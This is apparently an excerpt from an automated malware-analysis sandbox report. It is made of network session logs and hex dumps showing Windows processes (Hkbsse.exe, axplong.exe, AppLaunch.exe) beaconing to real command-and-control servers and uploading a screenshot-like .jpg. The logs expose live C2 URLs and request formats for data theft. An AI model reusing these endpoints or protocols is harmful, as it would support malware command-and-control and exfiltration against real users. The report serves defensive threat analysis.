Sep 3, 2024 17:13:56.472641945 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 38 30 00 00 00 00 00 61 09 00 00 00 d0 c4 00 00 0a 00 00 00 6c 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 31 00 00 00 00 00 05 8b 01 00 00 e0 c4 00 00 8c 01 00 00 76 5d 00 00 00 00 Data Ascii: @0B/80al]@B/91v]@B/102p_@B
Sep 3, 2024 17:13:56.472649097 CEST	1236	IN	Data Raw: fa 20 7e e7 89 cb 83 f3 01 80 fa 22 0f 44 cb eb e8 8d b4 26 00 00 00 00 8d 76 00 84 d2 74 14 8d 74 26 00 0f b6 50 01 83 c0 01 84 d2 74 05 80 fa 20 7e f0 a3 04 50 8c 00 8b 1d 4c 27 f3 00 85 db 74 14 b8 0a 00 00 00 f6 45 d0 01 0f 85 e2 00 00 00 a3 Data Ascii: ~"D&vtt&Pt ~PL'tE$P44$HG PEFEE$Gp4$GCOt$L$$G9}uEEE PqFP<RD$ PD$
Sep 3, 2024 17:13:56.472982883 CEST	1236	IN	Data Raw: 55 89 e5 83 ec 38 c7 45 dc 24 58 7a 00 c7 45 e0 d4 6d 75 00 c7 45 f0 00 00 00 00 8d 45 08 89 45 e4 8d 45 0c 89 45 e8 8d 45 10 89 45 ec 8b 45 f0 83 f8 01 77 11 8b 45 f0 8b 44 85 dc 8d 55 e4 89 14 24 ff d0 eb e7 90 c9 c3 55 89 e5 83 ec 38 c7 45 ec Data Ascii: U8E$XzEmuEEEEEEEEwEDU$U8E@E@EED6ED$ED$ED$ED$E$'v5EEDUSE@E@E@E\$L$T$$g.6E@]U
Sep 3, 2024 17:13:56.472995996 CEST	1236	IN	Data Raw: 00 00 dd 9c 24 90 00 00 00 d9 cd c7 84 24 8c 00 00 00 ae 10 88 00 dd 9c 24 84 00 00 00 d9 cb 8b 45 dc 89 84 24 80 00 00 00 8b 45 d8 89 44 24 7c 8b 45 d4 89 44 24 78 dd 5c 24 70 d9 c9 8b 45 d0 89 44 24 6c 8b 45 cc 89 44 24 68 dd 5c 24 60 dd 5c 24 Data Ascii: $$$E$ED$\|ED$x\$pED$lED$h\$`\$X\$PED$LED$HED$DED$@ED$<\$4ED$0\$(ED$$ED$ ED$ED$ED$ED$\|$t$L$$M5E@P[^_]U8EM(qE:q
Sep 3, 2024 17:13:56.473002911 CEST	1120	IN	Data Raw: 08 89 85 7c ff ff ff c7 85 78 ff ff ff 11 00 00 00 83 bd 7c ff ff ff 00 74 0f 8b 85 7c ff ff ff 8b 95 78 ff ff ff 89 50 1c b8 00 00 00 00 89 45 d4 8b 45 d4 e9 5f 01 00 00 8b 45 08 c7 40 3c af 34 7e 00 8b 45 08 c7 40 40 00 00 00 00 e9 bb 00 00 00 Data Ascii: \|x\|t\|xPEE_E@<4~E@@E@HtlE@DE9t;EtptttpPEEEPLEPPE@<E@@EE@<u;Elhltl
Sep 3, 2024 17:13:56.473660946 CEST	1236	IN	Data Raw: 89 44 24 18 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 07 e0 3a 00 90 90 c9 c3 55 89 e5 81 ec 88 00 00 00 c7 45 f4 00 00 00 00 83 7d f4 00 74 0f 83 7d f4 01 0f 85 Data Ascii: D$ED$ED$ED$ED$ED$E$:UE}t}EtD$lEpD$hElD$dEhD$`EdD$\E`D$XE\D$TEXD$PETD$LEPD$HELD$DEHD$@EDD$<E@D$8E<D$4E8D$0E4D$,E0D$(E,D$$E(D$ E$D$E D
Sep 3, 2024 17:13:56.473666906 CEST	1236	IN	Data Raw: 00 89 44 24 5c 8d 85 84 00 00 00 89 44 24 58 8d 45 90 89 44 24 54 8d 45 78 89 44 24 50 8d 45 74 89 44 24 4c 8d 45 70 89 44 24 48 8d 45 98 89 44 24 44 8d 45 64 89 44 24 40 8d 45 60 89 44 24 3c 8d 45 5c 89 44 24 38 8d 45 58 89 44 24 34 8d 45 a0 89 Data Ascii: D$\D$XED$TExD$PEtD$LEpD$HED$DEdD$@E`D$<E\D$8EXD$4ED$0ED$,EDD$(ED$$ED$ ED$E(D$ED$ED$ED$ED$ED$E$_FUEd+@E%+@EEDEE
Sep 3, 2024 17:13:56.473680019 CEST	1236	IN	Data Raw: 45 08 8b 18 89 5d c8 8b 45 10 dd 00 8b 45 34 8b 30 89 75 c4 8b 45 1c 8b 38 89 7d c0 8b 45 40 8b 10 89 55 bc 8b 45 14 dd 00 8b 45 48 8b 08 89 4d b8 8b 45 38 8b 18 89 5d b4 8b 45 24 dd 00 8b 45 30 8b 30 89 75 b0 8b 45 24 dd 00 8b 45 18 8b 38 89 7d Data Ascii: E]EE40uE8}E@UEEHME8]E$E00uE$E8}ETUETME]E0uE,8}E(UEH$MET]EPEE<0uE 8ET0ELEEP@EPE$E$E$$
Sep 3, 2024 17:13:56.473686934 CEST	1236	IN	Data Raw: 30 89 45 c8 8d 45 34 89 45 cc 8d 45 38 89 45 d0 8d 45 3c 89 45 d4 8d 45 40 89 45 d8 8d 45 44 89 45 dc 8d 45 48 89 45 e0 8d 45 4c 89 45 e4 8d 45 50 89 45 e8 8d 45 54 89 45 ec 8b 45 f0 83 f8 01 77 11 8b 45 f0 8b 44 85 98 8d 55 a0 89 14 24 ff d0 eb Data Ascii: 0EE4EE8EE<EE@EEDEEHEELEEPEETEEwEDU$UxE}t}EdD$\E`D$XE\D$TEXD$PETD$LEPD$HELD$DEHD$@EDD$<E@D$8E<D$4E8D$0E4D$,E0D$(E,D$$E(D$ E$D$E
Sep 3, 2024 17:13:56.478157997 CEST	1236	IN	Data Raw: 45 30 89 44 24 28 8b 45 2c 89 44 24 24 8b 45 28 89 44 24 20 8b 45 24 89 44 24 1c 8b 45 20 89 44 24 18 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 8f ce 42 00 c7 45 Data Ascii: E0D$(E,D$$E(D$ E$D$E D$ED$ED$ED$ED$ED$E$BEU8EEEED$EUD$T$E$pDEEUE8UE9EUEEE;E\|U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	49779	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:56.306936979 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:57.230083942 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:57.343518019 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:57.638741016 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	49780	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:56.604280949 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTI4MzQ4 Host: 185.215.113.19 Content-Length: 128500 Cache-Control: no-cache
Sep 3, 2024 17:13:56.604280949 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 49 34 4d 7a 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTI4MzQ4Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:13:56.604348898 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:13:56.604348898 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:13:56.604392052 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:13:56.604392052 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:13:56.604435921 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:13:56.604435921 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:13:56.604473114 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:13:56.604473114 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:13:56.604520082 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:13:59.034383059 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	49781	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:56.810434103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:57.615626097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:57.633183002 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:13:57.896364927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	49782	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:57.873403072 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:58.704328060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:59.081729889 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:13:59.378335953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	49783	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:58.228288889 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:13:59.033390999 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:13:59.177892923 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:13:59.503979921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	49784	185.215.113.19	80	5264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:59.453361034 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTA4MTA= Host: 185.215.113.19 Content-Length: 90962 Cache-Control: no-cache
Sep 3, 2024 17:13:59.453406096 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 41 34 4d 54 41 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTA4MTA=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Sep 3, 2024 17:13:59.453932047 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Sep 3, 2024 17:13:59.453944921 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Sep 3, 2024 17:13:59.453980923 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Sep 3, 2024 17:13:59.454036951 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Sep 3, 2024 17:13:59.454036951 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Sep 3, 2024 17:13:59.454067945 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Sep 3, 2024 17:13:59.454097986 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Sep 3, 2024 17:13:59.454097986 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Sep 3, 2024 17:13:59.454157114 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Sep 3, 2024 17:14:01.373682976 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	49785	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:59.748944998 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:00.418914080 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:00.444533110 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:00.743269920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	49786	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:59.843683004 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:00.620239973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:00.655105114 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 3, 2024 17:14:00.937321901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	49787	185.215.113.26	80	4208	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:00.899569988 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:01.719436884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:02.077667952 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Sep 3, 2024 17:14:02.369843006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	49789	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:14:01.093849897 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 3, 2024 17:14:01.882141113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:14:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 3, 2024 17:14:02.037569046 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
